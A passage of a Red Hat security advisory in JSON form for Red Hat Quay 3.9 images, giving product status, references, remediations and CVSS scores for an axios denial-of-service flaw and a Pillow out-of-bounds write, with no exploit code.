"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439170"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
